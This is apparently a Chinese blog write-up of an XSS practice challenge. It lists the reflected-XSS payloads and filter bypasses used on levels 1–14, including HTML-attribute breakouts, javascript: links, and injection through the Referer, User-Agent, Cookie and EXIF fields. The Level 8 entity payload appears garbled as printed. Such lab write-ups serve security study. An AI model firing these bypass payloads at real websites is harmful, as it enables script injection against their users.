本文记录xss挑战解题,检验自己的xss技术
题目链接
Level1
链接为http://test.xss.tv/level1.php?name=test
页面没有输入点
直接构造payloadname=<script>alert(1)</script>

Level2
一样简单,给出payload"><script>alert(1)</script>

Level3
过滤了尖括号
故用`’ οnclick=alert(1)//

Level4
和L3一样,不同的是这里用双引号闭合
" onclick=alert(1)//

Level5
用上面的进行尝试,发现将onclick变成o_nclick
这里改用添加链接方式
"><a href="javascript:alert(1)">
然后点击链接即可

Level6
这里也将href过滤成hr_ef
这里用大小写绕过过滤
"><a hrEf="javascript:alert(1)">

Level7
这里直接将href script删除
于是采用机智方法
"><a hrhrefef="javascrscriptipt:alert(1)">

Level8
这里可以添加链接到页面
于是直接javascript:alert(1)
但是不行因为会将script过滤成scr_ipt
这里采用HTML字符实体转换
将script转化成script
最后payload javascript:alert(1)

Level9
使用上关的payload,被提示不合法,说明对链接进行了格式要求
这里尝试了很多次,最后看到网上的解答,吐血
因为这里只需要有http://即可
javascript:alert("http://")
值得一提的是双引号会被过滤,于是第一个双引号用实体转换机即可

Level10
看源码,发现有几个type=hidden的输入框
于是使其显示并可以onclick触发事件
http://test.xss.tv/level10.php?t_sort=4" onclick=alert(1) type="text"

Level11
看源码,有个是显示referer
<input name="t_ref" value="http://test.xss.tv/level10.php?t_sort=4%22%20onclick=alert(1)%20type=%22text%22" type="hidden">
这里也是尝试很多次,但是始终无法使得输入框改变type
最后百度得出要抓包改referer即可
修改referer=12356" onclick=alert(1) type=text

Level12
和上一关类似,这次修改user-agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" onclick=alert(1) type="text"

Level13
看网页源码有个输入框叫cook,故去看看cookie
果然有个cookie值为call me maybe
修改cookiecall me maybe?" onclick=alert(1) type="text"

Level14
这里也是没思绪
百度得出答案,这里用的是乌云爆出的exif viewer的漏洞
修改图片exif信息如标题、作者' "><img src=1 onerror=alert(document.domain)>即可
之后第15关的链接失效了,就没做下去了

XSS挑战之旅 解题记录相关推荐

  1. XSS平台 XSS挑战之旅 解题记录 writeup

    XSS平台 XSS挑战之旅 解题记录 writeup level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 le ...

  2. test.ctf8(XSS挑战之旅)解题记录

    xss平台网址:test.ctf8.com 过关条件:只有能够跳出完成得不错得提示框,即为过关 level1 第一关没啥好说得,入门题 payload <script>alert('abc ...

  3. XSS挑战之旅---游戏通关攻略

    最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...

  4. 从xss挑战之旅来重读xss(一)

    在开始这篇文章之前,先简单聊几句: xss很多时候是鸡肋,比如说self-xss 很多厂商都会注明拒收反射xss,如58src 遇到请证明危害性的说法就走,人家的潜台词也是拒收反射xss 遇到收反射x ...

  5. xss挑战之旅11-19关

    文章目录 前言 第11关:referer 第12关:User-Agent 第13关:cookie 第14关:exif xss 第15关:ng-include 第16关 第17关 第18关 第19关:f ...

  6. XSS学习-XSS挑战之旅(二)

    前言:之前打XSS平台时,打到了第11关就没有继续了,现在有空了就继续打咯,再增加点关于XSS的知识. 第十一关 这关坑我好长时间,看了好多博客直接给说修改Referer,给截图中都有自带的Refer ...

  7. Docker下搭建XSS挑战之旅靶场

    我是在centos7下使用docker搭建xss挑战之旅靶场 一.先安装下docker容器 1.安装需要的软件包, yum-util 提供yum-config-manager功能,另两个是device ...

  8. ubuntu使用docker搭建xss挑战之旅环境

    ubuntu使用docker搭建xss挑战之旅环境 (1)启动docker docker systemctl start docker (2)下载docker-compose部署容器 git clon ...

  9. 使用docker搭建sqli-lab环境以及upload-labs环境 xss挑战之旅环境 搭建vulhub环境

    sqli-lab环境 1)查找sqli-lab环境 docker search sqli-labs 2)拉取镜像 docker pull acgpiano/sqli-labs 3) docker ru ...

最新文章

  1. php中magic_quotes_gpc对unserialize的影响
  2. 余弦距离(Cosine距离)与编辑距离分别是什么?各有什么优势和使用场景?
  3. 九度OJ 区间问题 10000个随机正负数生成
  4. java coding_java coding学习
  5. 某业务付费统计脚本问题排查
  6. 在ubuntu16下安装virtualenv+virtualenvwrapper
  7. ant 安装及基础教程 !
  8. win10树莓派改ip_Window 10通过网线和Wifi连接树莓派
  9. 【剑指offer】_02替换空格
  10. 用户使用说明c语言,(C语言使用指南.docx
  11. linux下c语言读取roed文件,如何在Linux系统上安装Android4.4.docx
  12. Mysql Federated For Windows
  13. 最实用的正则表达式整理
  14. android listview优化,Android ListView 详解及其优化
  15. PS 做动态图视频教程
  16. python 大数据入门教程
  17. 按键精灵的5级开发认证,笔试题参考
  18. [bzoj2827]千山鸟飞绝【splay】
  19. IOS 学习笔记14 内存管理(3)有效的内存管理 后半部分
  20. 移动硬盘坏了数据可以恢复吗?新方法一看便知

热门文章

  1. Oracle 常用工具和问题分析
  2. JavaScript最详细攻略
  3. 使用阿里云DNS实现自己的DDNS服务
  4. 物体重心的特点是什么_重心是什么的交点?
  5. 什么是GP、LP、VC、PE、FOF
  6. Virtualbox centos虚拟机网络互联总结
  7. Python读写zip压缩文件的方法
  8. android zip文件读写,【Android】Zip文件解压方法
  9. ad hoc是什么的简称_ad hoc是什么意思
  10. 要不要试试 FBI 出品的健身APP,绝对不收集信息